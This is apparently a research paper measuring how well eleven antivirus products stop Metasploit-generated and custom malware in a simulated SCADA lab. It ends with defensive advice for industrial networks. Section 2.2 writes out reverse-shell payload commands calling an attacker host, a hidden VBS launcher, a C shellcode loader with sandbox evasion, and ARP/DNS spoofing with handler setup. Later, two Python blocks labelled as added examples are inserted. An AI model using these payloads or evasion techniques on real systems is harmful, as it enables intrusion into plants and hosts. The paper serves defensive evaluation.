ANTIVIRUS SOLUTIONS ARE ENOUGH TO PROTECT INDUSTRIAL PLANTS?

Jan Seidl (1)
Marcelo Ayres Branquinho (2)



Summary

Malware infections are becoming increasingly common in industrial plants, in some cases
leading to loss of control and to the compromise of key servers on the automation network.
In the majority of the infections we investigated at our Brazilian clients there was in fact an
anti-virus solution installed on the hosts of the infected network, and it was able neither to
detect nor to stop the infection and its replication.

The anti-virus comparisons found on the Internet and in specialized magazines evaluate how
effectively the solutions prevent infection on personal computers or corporate networks, but
they are not an adequate basis of comparison when choosing a prevention solution for
SCADA networks.

In order to better orient our clients about the anti-virus solution that would best fit an
automation network, we decided to run an independent and unbiased test, without any vendor
connection, to determine the extent of the protection against threats given by each of the top
market solutions.

This paper presents a series of tests carried out at our laboratories to measure each antivirus
solution's efficacy against low- and medium-complexity attacks using open source attack tools
that are easily downloaded from the Internet.




Keywords: Antivirus, SCADA, Security, Malware, Attacks.

(1) CTO at TI Safe Segurança da Informação Ltda, Brasil (http://br.linkedin.com/in/janseidl)
(2) CEO at TI Safe Segurança da Informação Ltda, Brasil (http://br.linkedin.com/in/marcelobranquinho)
1 INTRODUCTION

An increasing number of Brazilian industries are facing serious trouble related to malware
infections in their automation plants, in some cases leading to loss of control, HMI freezing
and the compromise of key servers on the automation network.

In all the cases in which we acted, the automation networks had antivirus solutions installed
and updated, at least on some servers, and those solutions were not able to prevent the servers
from becoming infected or the infection from spreading throughout the company's automation
network, causing serious problems.

Looking at these cases in plants of Brazilian customers, our SCADA Security Division [1]
decided to investigate independently, and without any influence from any manufacturer, the
extent to which anti-virus solutions are effective in detecting and combating threats in
automation networks.

The topics that follow detail the tests performed in the TI Safe laboratory in the city of
Rio de Janeiro from 25 to 27 January 2012, the results obtained and the conclusions reached,
trying to answer a simple question: how effective is an antivirus solution in protecting
industrial networks?
2 METHODOLOGY APPLIED

2.1 THE TESTING VIRTUAL NETWORK

Prior to performing the tests we configured a small virtual test network, whose architecture
is shown in the figure below:




Machine (a) – Victim

Virtual machine with the Microsoft Windows 7 Enterprise 32-bit operating system, running on
the Oracle VirtualBox 3.2.8_OSE virtualization platform. After installing the operating system,
the machine received all security updates and patches through Windows Update. Adobe Reader
version 8.1.2 and Java Runtime Environment version 6 update 30 were installed to serve as
infection vectors to be exploited in our tests. After completing the virtual machine
configuration with the components listed above, we took a snapshot of the machine called
'Initial State', which is used as the starting point for all tests.

Machine (b) – Apache Web Server (Fake intranet)

To simulate a virtual network with a corporate intranet, we set up an Apache web server on
another machine within Oracle VirtualBox 3.2.8_OSE. The victim machine has an Internet
Explorer 9 browser with its home page configured to the URL of the Apache web server
(supposedly, the corporate intranet). This is a common configuration in enterprise
environments; during testing we cloned this site and injected malware into its original HTML
to serve as an attack vector for social engineering.

Machine (c) – Attacker

The machine is an HP Pavilion DV6780se laptop with BackTrack Linux [2] version 4 and the
Metasploit Framework [3] version 3 Community, fully updated. The Metasploit Framework is a
framework for the development and launch of exploits, frequently used in penetration testing.
It consists of a series of tools, exploits and code snippets that can be used through
different interfaces.
2.2 DESCRIPTION OF THE ATTACKS MADE

The samples used in the tests were partly generated by the Metasploit Framework, partly
delivered through web vectors, partly reused from open source code injectors and partly coded
internally by TI Safe's SCADA security team in the lab.

The 16 malware samples used in the tests were the following:

1. “EICAR”: EICAR [4] anti-virus test file.

2. “Metasploit EXE Default Template (no encryption)”: Binary file generated by the
   Metasploit Framework with a Meterpreter (MSF native interpreter) payload inside the
   default binary template, without payload encryption.

   # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample2.exe -e generic/none

3. “Metasploit EXE Default Template (shikata_ga_nai)”: Binary file generated by the
   Metasploit Framework with a Meterpreter (MSF native interpreter) payload inside the
   default binary template, with shikata_ga_nai payload encryption.

   # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample3.exe -e x86/shikata_ga_nai

4. “Metasploit EXE Notepad Template (no encryption)”: Binary file generated by the
   Metasploit Framework with a Meterpreter (MSF native interpreter) payload inside the
   original Notepad (notepad.exe) of a Turkish Windows 7, used as template, without
   payload encryption.

   # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample4.exe -e generic/none -k -x notepad_win7_turkish.exe

5. “Metasploit EXE Notepad Template (shikata_ga_nai)”: Binary file generated by the
   Metasploit Framework with a Meterpreter (MSF native interpreter) payload inside the
   original Notepad (notepad.exe) of a Turkish Windows 7, used as template, with
   shikata_ga_nai payload encryption.

   # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample5.exe -e x86/shikata_ga_nai -k -x notepad_win7_turkish.exe

6. “Metasploit EXE SkypePortable Template (shikata_ga_nai)”: Binary file generated by the
   Metasploit Framework with a Meterpreter (MSF native interpreter) payload inside
   Skype Portable (SkypePortable_online.paf.exe), used as template, with shikata_ga_nai
   payload encryption.

   # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample6.exe -e x86/shikata_ga_nai -k -x SkypePortable_online.paf.exe

7. “Metasploit LOOP-VBS Default Template (no encryption)”: VBS script generated by the
   Metasploit Framework with a Meterpreter (MSF native interpreter) payload, without
   payload encryption.

   # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t loop-vbs -o sample7.exe -e generic/none

8. “Metasploit LOOP-VBS Default Template (shikata_ga_nai)”: VBS script generated by the
   Metasploit Framework with a Meterpreter (MSF native interpreter) payload, with
   shikata_ga_nai payload encryption.

   # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t loop-vbs -o sample8.exe -e x86/shikata_ga_nai

9. “Shellcodexec Default w/ VBS launcher”: ShellcodeExec [5] code injector with a VBS
   launcher and an alphanumeric payload generated by MSF. The ShellcodeExec code
   injector has no embedded payload and receives it as a command-line argument. The
   payload is generated through MSF:

   # msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=10.1.1.106 LPORT=31337 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

   Output: a single alphanumeric shellcode string (not reproduced here), which the
   launcher passes to the injector as its argument.

   We created a VBS script to run the binary, passing the payload as its argument:

   ' Resolve the directory this script lives in and launch scex32.exe from there,
   ' hidden (window style 0) and without waiting for it to finish.
   Set oShell = CreateObject("Wscript.Shell")
   sPath = Wscript.ScriptFullName
   x = InStrRev(sPath, "\")
   sPath = Left(sPath, x)
   ' Placeholder for the alphanumeric payload string produced by msfencode above.
   sPayload = "<alphanumeric payload from the msfencode output above>"
   sCmd = sPath & "scex32.exe " & sPayload
   oShell.Run sCmd, 0, False


10. “TI Safe Modded Shellcodeexec (w/ VBS launcher)”: ShellcodeExec code injector
    modified by TI Safe, with a VBS launcher and an alphanumeric payload generated by MSF.

    We took ShellcodeExec's source code, renamed all functions and variables at random
    (obfuscation) and changed the execution flow in order to evade the anti-virus
    software's heuristic signatures.

11. “TI Safe Modded Shellcodeexec (Custom EXE w/ embedded payload)”: ShellcodeExec
    code injector modified by TI Safe, with an embedded alphanumeric payload generated
    by MSF.

    We removed the program's argument passing (argv[1]) to the injector function and read
    the payload from a char[] variable instead, so that the whole malware is in a single file.

12. “TI Safe Custom Payload Launcher”: Code injector created at the TI Safe laboratory
    with an embedded alphanumeric payload generated by MSF and a rudimentary anti-virus
    sandbox evasion mechanism.

    We built a small C program that calls VirtualAlloc() with the PAGE_EXECUTE_READWRITE
    protection:

        /* Reserve and commit a readable, writable and executable region. */
        void* p = VirtualAlloc(NULL, PAYLOAD_SIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    copies the payload into the newly reserved memory area:

        /* Placeholder for the alphanumeric payload string shown for sample 9;
           PAYLOAD_SIZE is the length of that string. */
        char payload[PAYLOAD_SIZE] = "<alphanumeric payload from MSF>";

        char* pload_pointer = (char*) p;
        char* x = payload;
        int i;

        for (i = 0; i < PAYLOAD_SIZE; i++)
            *pload_pointer++ = *x++;

    and runs it:

        /* Treat the region as a function with no arguments and call it. */
        (*(void (*)()) p)();

    Finally, we added some functions that detect the behaviour of some sandboxes and abort
    the program with a clean exit (return 0), through timing analysis and function-bypass
    verification, to reduce the number of solutions that could catch our sample by
    execution tracing.

13. “Metasploit PDF (adobe_utilprintf)”: Meterpreter embedded into a PDF via the
    adobe_utilprintf exploit [6].

14. “Metasploit PDF (adobe_pdf_embedded_exe)”: Meterpreter embedded into a PDF via the
    adobe_pdf_embedded_exe exploit [7].

15. “Metasploit PDF (adobe_pdf_embedded_exe_nojs)”: Meterpreter embedded into a PDF via
    the adobe_pdf_embedded_exe_nojs exploit [8].

16. “Metasploit Java Applet”: Meterpreter embedded into a Java applet through a web-based
    attack. We used SET [9] (Social-Engineer Toolkit) to clone the intranet and inject the
    Java applet into its source code.

    From the main menu we chose: 1 (Social Engineering Attacks) → 2 (Website Attack
    Vectors) → 1 (Java Applet Attack Method) → 2 (Website Cloner) → 13
    (ShellCodeExec Alphanum Shellcode) → Windows Meterpreter Reverse Tcp.

    arpspoof [10] was used to perform a MITM (man-in-the-middle) attack through ARP
    poisoning. dnsspoof [10] was also used to spoof the victim's DNS requests, redirecting
    the traffic meant for the intranet to the attacker's machine, where the malicious copy
    of the website runs from a lightweight Python web server.

    Next, we open Internet Explorer 9 on the victim machine and wait for the intranet site
    to load automatically, as it is the configured start page. The browser requests name
    resolution for the intranet URL and receives the spoofed IP address, since the ARP
    cache is poisoned and the DNS replies are spoofed. The fake web page is loaded and a
    Java prompt asks whether the user wants to run a component that is presented as
    issued by the company.

    By clicking “Run”, the malware is executed.

    On the attacking machine (Machine (c)), we load the Metasploit Framework console
    (msfconsole) and start Meterpreter's handler, configured to keep accepting multiple
    sessions and to automatically run our script that migrates into the explorer.exe
    process, so the session does not end if the user closes the browser. The browser on
    the victim machine hangs briefly and is then automatically redirected to the real
    website.

    # msfconsole

    msf > use multi/handler
    msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 10.1.1.106
    msf exploit(multi/handler) > set LPORT 31337
    msf exploit(multi/handler) > set ExitOnSession false
    msf exploit(multi/handler) > set AutoRunScript /root/msf_scripts/migrate_to_explorer.rb

2.3 TEST METHODS

The methodology used for the tests follows the sequence of steps detailed below:

a) Setting up the victim machine with the antivirus solution to be tested: starting from
   the virtual machine in its 'Initial State', install and configure the antivirus
   solution to be tested. After installation, proceed with license registration (when
   available) and perform a complete update of the antivirus solution's signature
   database. After this we took a new snapshot of the machine called 'Protected State'.

   All antivirus software tested (except the free ones) was obtained from the
   manufacturers' websites in its evaluation version (32-bit) in English. All were
   installed with the 'Recommended' option.

   The antivirus solutions tested were the following:

   • McAfee Antivirus Plus 2012
   • Kaspersky Antivirus 2012
   • Panda Antivirus Pro 2012
   • Trend Titanium Maximum Security 2012
   • Norton Antivirus 2012
   • F-Secure Antivirus 2012
   • avast! Pro Antivirus 6
   • AVG Anti-Virus FREE 2012
   • Sophos Anti-Virus 7
   • Microsoft Security Essentials
   • E-SET NOD32 Antivirus 5

b) Execution of the attack: the victim machine in 'Protected State' is subjected to the
   first attack on the list and the results are noted.

c) Restoration of the victim machine: after the attack has been tested, the victim
   machine's 'Protected State' snapshot is restored and the next attack is performed.
   This sequence is repeated until all the attacks have been run against the antivirus
   under test. When the tests for one antivirus are finished, the same sequence is
   repeated for the next antivirus.

3 RESULTS

The results were compiled into a matrix (Appendix A). From the analysis of this matrix it was
observed that:

• The vast majority of detections were based on heuristics.
• The vast majority of antivirus solutions were not able to detect the threat in memory.
• Only two solutions reacted based on behavior: Sophos Anti-Virus 7 and Panda Antivirus
  Pro 2012.
• None of the solutions that detected an attack was able to stop it.
• None of the solutions achieved the highest score.
• None of the solutions could detect more than one of the malware samples created in TI
  Safe's laboratory (attacks 10, 11 and 12).
• Some commercial products were not able to detect any of the malware samples created in
  TI Safe's laboratory (attacks 10, 11 and 12).
• In terms of heuristics, some commercial solutions underperformed the free solutions and
  others had equivalent performance.
• All candidates failed to prevent the attack by the Java applet (attack 16).

The detection rate by type of malware obtained in our tests was as follows:

[Figure: "Infections by malware type" and "Detections by malware type" (charts);
categories: Metasploit-generated binaries, Java Applet, Custom malware, PDF]

[Figure: "Malware detection ratio" (axis 0 to 100) per malware type: Metasploit-generated
binaries, Java Applet, Custom malware, PDF]

[Figure: "Malware infection ratio" (axis 0 to 30) per malware type: Metasploit-generated
binaries, Java Applet, Custom malware, PDF]

In a ranking from 0 (minimum) to 16 (maximum) possible points, the final ranking of the
antivirus products tested was as follows:

   #   Product                            Score
   1   F-Secure Antivirus 2012            13
       Sophos Anti-Virus 7                13
   2   McAfee Antivirus Plus 2012         12
       Kaspersky Antivirus 2012           12
       avast! Pro Antivirus 6             12
       Microsoft Security Essentials      12
       E-SET NOD32 Antivirus 5            12
   3   Panda Antivirus Pro 2012           11
   4   Norton Antivirus 2012               9
       AVG Anti-Virus FREE 2012            9
   5   Trend Titanium Maximum Security     8
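How a score table like the one above is derived from the Appendix A matrix, as an added example that is not the paper's own tooling: one point per detected sample, a dense rank shared by tied products, and a detection ratio per malware type. The input is the part of the matrix reproduced on this page (samples 1 to 10), so the totals are partial and differ from the 16-sample scores above; the sample-to-type grouping is an assumption, since the paper does not state it.

```python
from collections import defaultdict

# Column order of Appendix A (one entry per product tested).
PRODUCTS = [
    "McAfee Antivirus Plus 2012", "Kaspersky Antivirus 2012", "Panda Antivirus Pro 2012",
    "Trend Titanium Maximum Security", "Norton Antivirus 2012", "F-Secure Antivirus 2012",
    "avast! Pro Antivirus 6", "AVG Anti-Virus FREE 2012", "Sophos Anti-Virus 7",
    "Microsoft Security Essentials", "E-SET NOD32 Antivirus 5",
]

# Malware type of each sample number from section 2.2. ASSUMPTION: the paper does
# not spell out this grouping; it is inferred from the chart categories.
SAMPLE_TYPE = {1: "EICAR test file"}
SAMPLE_TYPE.update({n: "Metasploit-generated binaries" for n in range(2, 9)})
SAMPLE_TYPE.update({n: "Custom malware" for n in range(9, 13)})
SAMPLE_TYPE.update({n: "PDF" for n in range(13, 16)})
SAMPLE_TYPE[16] = "Java Applet"

# Appendix A rows reproduced on this page (samples 1 to 10), in PRODUCTS order.
# A cell holds the detection name reported; "-" means the sample went undetected.
MATRIX = {
    1: ["EICAR test file", "EICAR-Test-File", "EICAR-AV-TEST-FILE", "Eicar_test_file",
        "EICAR Test String", "Trojan.Generic.6567028", "EICAR Test-NOT virus!!!",
        "EICAR_Test", "EICAR-AV-Test", "DOS/EICAR_Test_File", "Eicar test file"],
    2: ["Swrort.f", "Trojan.Win32.Generic", "Suspicious File", "TROJ_SWRORT.SME",
        "Packed.Generic.347", "Backdoor.Shell.AC", "Win32:SwPatch", "Win32/Heur",
        "Mal/EncPk-ACE", "Trojan.Win32/Swrort.A", "a variant of Win32/Rozena.AA trojan"],
    3: ["Swrort.d", "Trojan.Win32.Generic", "Suspicious File", "TROJ_SWRORT.SME",
        "Packed.Generic.347", "Backdoor.Shell.AC", "Win32:SwPatch", "Win32/Heur",
        "Mal/Swrort-C", "Trojan.Win32/Swrort.A", "a variant of Win32/Rozena.AH trojan"],
    4: ["Swrort.f", "Trojan.Win32.Generic", "Trj/Genetic.gen", "-", "-",
        "Backdoor.Shell.AC", "Win32:SwPatch", "-", "Mal/Swrort-C",
        "Trojan.Win32/Swrort.A", "a variant of Win32/Rozena.AA trojan"],
    5: ["Swrort.d", "Trojan.Win32.Generic", "Trj/Genetic.gen", "-", "-",
        "Backdoor.Shell.AC", "Win32:SwPatch", "Win32/Heur", "Mal/Swrort-C",
        "Trojan.Win32/Swrort.A", "a variant of Win32/Rozena.AH trojan"],
    6: ["Swrort.d", "Trojan.Win32.Generic", "-", "-", "-", "Backdoor.Shell.AC",
        "Win32:SwPatch", "-", "Mal/Swrort-C", "Trojan.Win32/Swrort.A",
        "a variant of Win32/Rozena.AH trojan"],
    7: ["Swrort.f", "Trojan.Win32.Generic", "Script Blocked", "TROJ_SWRORT.SME",
        "Packed.Generic.347", "Backdoor.Shell.AC", "Win32:SwPatch", "-",
        "Mal/Swrort-C", "Trojan.Win32/Swrort.A", "a variant of Win32/Rozena.AA trojan"],
    8: ["Swrort.f", "Trojan.Win32.Generic", "Script Blocked", "TROJ_SWRORT.SME",
        "Packed.Generic.347", "Backdoor.Shell.AC", "Win32:SwPatch", "-",
        "Mal/Swrort-C", "Trojan.Win32/Swrort.A", "a variant of Win32/Rozena.AH trojan"],
    9: ["Generic.tfr!i", "Trojan.Win32.Genome.vrrg", "Trj/CI.A", "-", "Trojan.Gen",
        "Trojan.Generic.6567028", "Win32:Malware-gen", "Trojan Generic22.KPM",
        "Mal/Generic.L", "-", "Win32/ShellcodeRunner.A trojan"],
    10: ["-", "-", "Script Blocked", "-", "-", "-", "-", "-", "-", "-", "-"],
}


def detected(cell):
    """A cell counts as a detection unless it is empty or the '-' marker."""
    return cell.strip() not in ("", "-")


def product_scores(matrix):
    """One point per sample detected: the paper's 0..16 scale (0..10 here)."""
    scores = {p: 0 for p in PRODUCTS}
    for cells in matrix.values():
        assert len(cells) == len(PRODUCTS), "row does not match column count"
        for product, cell in zip(PRODUCTS, cells):
            if detected(cell):
                scores[product] += 1
    return scores


def dense_ranking(scores):
    """Order by score; products with equal scores share a rank (1, 2, 3, ...),
    which is how the ranking table in section 3 is laid out."""
    ordered = sorted(scores.items(), key=lambda kv: (-kv[1], PRODUCTS.index(kv[0])))
    ranking, rank, last = [], 0, None
    for product, score in ordered:
        if score != last:
            rank, last = rank + 1, score
        ranking.append((rank, product, score))
    return ranking


def detection_ratio_by_type(matrix):
    """Percentage of (product, sample) pairs detected, grouped by malware type."""
    hits, total = defaultdict(int), defaultdict(int)
    for number, cells in matrix.items():
        kind = SAMPLE_TYPE[number]
        total[kind] += len(cells)
        hits[kind] += sum(1 for c in cells if detected(c))
    return {kind: round(100.0 * hits[kind] / total[kind], 1) for kind in total}


if __name__ == "__main__":
    for rank, product, score in dense_ranking(product_scores(MATRIX)):
        print(f"{rank:>2}  {product:<32} {score:>2}")
    for kind, pct in detection_ratio_by_type(MATRIX).items():
        print(f"{kind:<30} {pct:5.1f}%")
```

On these ten rows every product except Microsoft Security Essentials, Norton, Trend and AVG ties for first place, which already shows the spread the paper reports comes mostly from the custom samples and the PDF and applet vectors not reproduced here.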
4 DISCUSSION

Can we trust the antivirus tests we read in magazines or find on the Internet?

A quick Internet search finds hundreds of articles analysing antivirus products, many
containing detailed recommendations and expert opinions based on experience, and most of
them concerned with use on home computers.

Because of this, it is difficult to rely on these tests when we need to protect a critical asset
such as an automation network. Moreover, much of the analysis is biased and seeks to favour
the antivirus vendors that sponsored it.

Serious research should be based on a reliable methodology and have no commercial interests
involved. Some international organizations, such as the nonprofit AMTSO [11] (Anti-Malware
Testing Standards Organization), provide test methods and extensive documentation to
improve the quality, objectivity and relevance of antivirus analyses.


5 CONCLUSIONS

How effective is an antivirus solution in protecting automation networks?

Most anti-virus technologies are based on knowledge of attack signatures, which is great if
you are fighting common threats like Conficker or Slammer, for example. Our tests showed
that when the malware is a little more sophisticated or exploits unknown Windows
vulnerabilities (zero-days), the antivirus solutions do little to defend the system.

We are not just talking about sophisticated cyber weapons such as Stuxnet and Duqu, but
about less sophisticated attacks that script kiddies can perform with the aid of attack tools
downloaded from the Internet.

Our study showed that no antivirus solution is able to provide full protection for automation
networks, and that relying on one leads companies to a "false sense of security": they believe
they are safe while the network may be infested with malware and suffering attacks ranging
from industrial espionage to the takeover of their systems by external attackers.

If a security expert says that SCADA systems can be protected using only antivirus solutions,
he may be committing a grave error and undermining the productivity of the company.
Antivirus products are recommended, but they do not provide all the security necessary in
control system networks.

Our recommendation for a more secure automation network is the use of compensating
controls beyond the antivirus solution. These controls protect the network against attacks
before they even infect the control network.

Segmentation of the automation network according to the ANSI/ISA-99 standard (the zones
and conduits model [12]) is very important and should be done. At the entrance to each
security zone there should be security equipment such as edge firewalls and intrusion
detection and prevention systems (IDPSs) configured with SCADA signatures.

A good review of the existing firewall rules that protect the automation network (driven by
industry best practices), tight control over any device that is connected to the SCADA
network (third-party laptops, removable media, modems, etc.) and deep inspection of new
programs before they are installed can dramatically increase the level of security and prevent
infections.

Some practices should be the rule in automation networks: not allowing email and web access
from within the automation network and, as far as possible, keeping the security patches of
the most critical computers up to date are extremely desirable. All security solutions installed
and configured on the automation network should send their logs to a single database managed
by a good SIEM (Security Information and Event Management) solution, which will alert the
security team at the slightest sign of a security incident.
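A minimal zones-and-conduits check of the kind the edge firewall and SIEM pairing above would perform, added here as an example that is not from the paper or from TI Safe: a conduit allow-list between zones is applied to connection-log lines, and any flow crossing a zone boundary outside an approved conduit is raised as an alert for the security team. The zone addresses, conduits, log format and log lines are all constructed; only the tcp/31337 callback port is taken from the tests above.

```python
import ipaddress
from collections import namedtuple

Flow = namedtuple("Flow", "ts src dst proto dport")

# Constructed zone model (ANSI/ISA-99 sense): a zone is a set of networks; any
# address outside every zone is treated as "untrusted".
ZONES = {
    "automation": [ipaddress.ip_network("10.1.1.0/24")],
    "corporate": [ipaddress.ip_network("10.1.2.0/24")],
}

# Constructed conduits: (source zone, destination zone) -> allowed (proto, port).
# Everything not listed here is, by policy, a flow the zone firewall should not see.
CONDUITS = {
    ("automation", "corporate"): {("tcp", 443)},   # historian replication
    ("corporate", "automation"): {("tcp", 3389)},  # remote access via jump host
}


def zone_of(ip):
    """Name of the zone an address belongs to, or 'untrusted' if none matches."""
    addr = ipaddress.ip_address(ip)
    for name, networks in ZONES.items():
        if any(addr in net for net in networks):
            return name
    return "untrusted"


def parse_line(line):
    """Parse one constructed firewall log line of the form
    '<timestamp> CONN src=<ip> dst=<ip> proto=<tcp|udp> dport=<port>'.
    Returns None for lines that are not connection records."""
    fields = line.split()
    if len(fields) < 6 or fields[1] != "CONN":
        return None
    kv = dict(part.split("=", 1) for part in fields[2:])
    return Flow(fields[0], kv["src"], kv["dst"], kv["proto"], int(kv["dport"]))


def evaluate(flow):
    """Return None when the flow follows an approved conduit, else an alert dict."""
    src_zone, dst_zone = zone_of(flow.src), zone_of(flow.dst)
    if src_zone == dst_zone:
        # Intra-zone traffic never crosses the zone firewall; host controls apply.
        return None
    if (flow.proto, flow.dport) in CONDUITS.get((src_zone, dst_zone), set()):
        return None
    return {
        "ts": flow.ts, "src": flow.src, "dst": flow.dst,
        "path": f"{src_zone}->{dst_zone}", "service": f"{flow.proto}/{flow.dport}",
        "reason": "no approved conduit for this flow",
    }


def find_violations(lines):
    """Run every log line through the conduit policy and collect the alerts."""
    alerts = []
    for line in lines:
        flow = parse_line(line)
        if flow is not None:
            alert = evaluate(flow)
            if alert is not None:
                alerts.append(alert)
    return alerts


# Constructed sample log: an allowed historian push, an allowed remote-access
# session, an HMI in the automation zone calling back to an unassigned host on
# tcp/31337 (the reverse_tcp port used in the tests above), an intra-zone
# database connection, and an SMB attempt from the corporate zone.
SAMPLE_LOG = [
    "2012-01-26T10:00:01 CONN src=10.1.1.20 dst=10.1.2.10 proto=tcp dport=443",
    "2012-01-26T10:00:05 CONN src=10.1.2.30 dst=10.1.1.50 proto=tcp dport=3389",
    "2012-01-26T10:02:17 CONN src=10.1.1.50 dst=10.1.3.106 proto=tcp dport=31337",
    "2012-01-26T10:02:18 CONN src=10.1.1.50 dst=10.1.1.20 proto=tcp dport=1433",
    "2012-01-26T10:03:00 CONN src=10.1.2.30 dst=10.1.1.50 proto=tcp dport=445",
    "2012-01-26T10:03:01 DROP src=10.1.2.30 dst=10.1.1.50 proto=tcp dport=445",
]

if __name__ == "__main__":
    for alert in find_violations(SAMPLE_LOG):
        print(alert)
```

The check deliberately ignores intra-zone flows, which is exactly the gap a flat lab network like the one in section 2.1 leaves open: a callback to a host inside the same zone has to be caught by host-level or IDPS controls instead.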

In addition to prevention, companies should be prepared for the worst case and have a
contingency plan in case anything goes wrong and the plant automation gets infected. It is
essential to have automated backup tools installed, as well as redundancy in the critical
servers of the automation network. Our experience shows that the process of disinfecting a
contaminated automation network is quite costly and complex, and that its success depends
on the cooperation of the manufacturers, which makes the process slow. We encourage the
international community to create a guide of good practices for the disinfection of an
automation plant. This guide would serve as a baseline to be followed by companies facing
this problem in order to regain control over their SCADA systems in a planned and preferably
rapid manner.

REFERENCES ON THE INTERNET

[1]  http://www.tisafe.com/solucoes/seguranca-scada/
[2]  http://www.backtrack-linux.org/
[3]  http://www.metasploit.com/
[4]  http://www.eicar.org/86-0-Intended-use.html
[5]  https://github.com/inquisb/shellcodeexec
[6]  http://www.metasploit.com/modules/exploit/windows/browser/adobe_utilprintf
[7]  http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe
[8]  http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
[9]  http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)
[10] http://monkey.org/~dugsong/dsniff/
[11] http://www.amtso.org
[12] http://www.slideshare.net/tisafe/apresentao-tcnica-segurana-scada-realizada-no-isa-show-2011

APPENDIX A – MATRIX OF TEST RESULTS


                                        McAfee Antivirus Plus Kaspersky Antivirus     Panda Antivirus Pro    Trend Titanium                                                                                 AVG Anti-Virus FREE                           Microsoft Security
                                                                                                                             Norton Antivirus 2012 F-Secure Antivirus 2012        avast! Pro Antivirus 6                           Sophos Anti-Virus 7                             E-SET NOD32 Antivirus 5
                                               2012                 2012                    2012            Maximum Security                                                                                      2012                                        Essentials


                 EICAR                     EICAR test file      EICAR-Test-File       EICAR-AV-TEST-FILE      Eicar_test_file     EICAR Test String     Trojan.Generic.6567028    EICAR Test-NOT virus!!!       EICAR_Test           EICAR-AV-Test       DOS/EICAR_Test_File             Eicar test file


  Metasploit EXE Default Template (no                                                                                                                                                                                                                                            a variant of Win32/Rozena.AA
                                               Swrort.f       Trojan.Win32.Generic      Suspicious File     TROJ_SWRORT.SME Packed.Generic.347             Backdoor.Shell.AC         Win32:SwPatch              Win32/Heur           Mal/EncPk-ACE       Trojan.Win32/Swrort.A
              encryption)                                                                                                                                                                                                                                                                     trojan

    Metasploit EXE Default Template                                                                                                                                                                                                                                              a variant of Win32/Rozena.AH
                                              Swrort.d        Trojan.Win32.Generic      Suspicious File     TROJ_SWRORT.SME Packed.Generic.347             Backdoor.Shell.AC         Win32:SwPatch              Win32/Heur            Mal/Swrort-C       Trojan.Win32/Swrort.A
           (shikata_ga_nai)                                                                                                                                                                                                                                                                   trojan

 Metasploit EXE Notepad Template (no                                                                                                                                                                                                                                             a variant of Win32/Rozena.AA
                                               Swrort.f       Trojan.Win32.Generic      Trj/Genetic.gen              -                    -                Backdoor.Shell.AC         Win32:SwPatch                    -               Mal/Swrort-C       Trojan.Win32/Swrort.A
              encryption)                                                                                                                                                                                                                                                                     trojan

   Metasploit EXE Notepad Template                                                                                                                                                                                                                                               a variant of Win32/Rozena.AH
                                              Swrort.d        Trojan.Win32.Generic      Trj/Genetic.gen              -                    -                Backdoor.Shell.AC         Win32:SwPatch              Win32/Heur            Mal/Swrort-C       Trojan.Win32/Swrort.A
          (shikata_ga_nai)                                                                                                                                                                                                                                                                    trojan

Attack vector | detection name per antivirus product (one column per product, in the order of the matrix header above; "-" = not detected)
Metasploit EXE SkypePortable Template (shikata_ga_nai) | Swrort.d | Trojan.Win32.Generic | - | - | - | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AH trojan
Metasploit LOOP-VBS Default Template (no encryption) | Swrort.f | Trojan.Win32.Generic | Script Blocked | TROJ_SWRORT.SME | Packed.Generic.347 | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AA trojan
Metasploit LOOP-VBS Default Template (shikata_ga_nai) | Swrort.f | Trojan.Win32.Generic | Script Blocked | TROJ_SWRORT.SME | Packed.Generic.347 | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AH trojan
Shellcodexec Default w/ VBS launcher | Generic.tfr!i | Trojan.Win32.Genome.vrrg | Trj/CI.A | - | Trojan.Gen | Trojan.Generic.6567028 | Win32:Malware-gen | Trojan Generic22.KPM | Mal/Generic.L | - | Win32/ShellcodeRunner.A trojan
TI Safe Modded Shellcodeexec (w/ VBS launcher) | - | - | Script Blocked | - | - | - | - | - | - | - | -
TI Safe Modded Shellcodeexec (Custom EXE w/ embedded payload) | - | - | - | - | - | Backdoor.Shell.AC | - | Trojan Generic22.SND | - | Trojan.Win32/Swrort.A | -
TI Safe Custom Payload Launcher | - | - | - | - | - | - | - | - | Mal/FakeAV-FS | - | -
Metasploit PDF (adobe_utilprintf) | Exploit.PDF.bk.gen | Exploit.JS.Pdfka.cil | - | HEUR_PDFEXP.B | Bloodhound.Exploit.213 | Exploit.PDF-JS.Gen | JS:Pdfka-gen | Script/Exploit | Troj/PDFJs-B | Trojan.Win32/Swrort.A | JS/Exploit.Pdfka.NOO trojan
Metasploit PDF (adobe_pdf_embedded_exe) | Swrort.f | Trojan.Win32.Generic | Suspicious File | TROJ_SWRORT.SME | Bloodhound.PDF.24 | Exploit.PDF-Dropper.Gen | Win32:SwPatch | Exploit.PDF | Mal/Swrort-C | Trojan.Win32/Swrort.A | PDF/Exploit.Pidief.PFW trojan
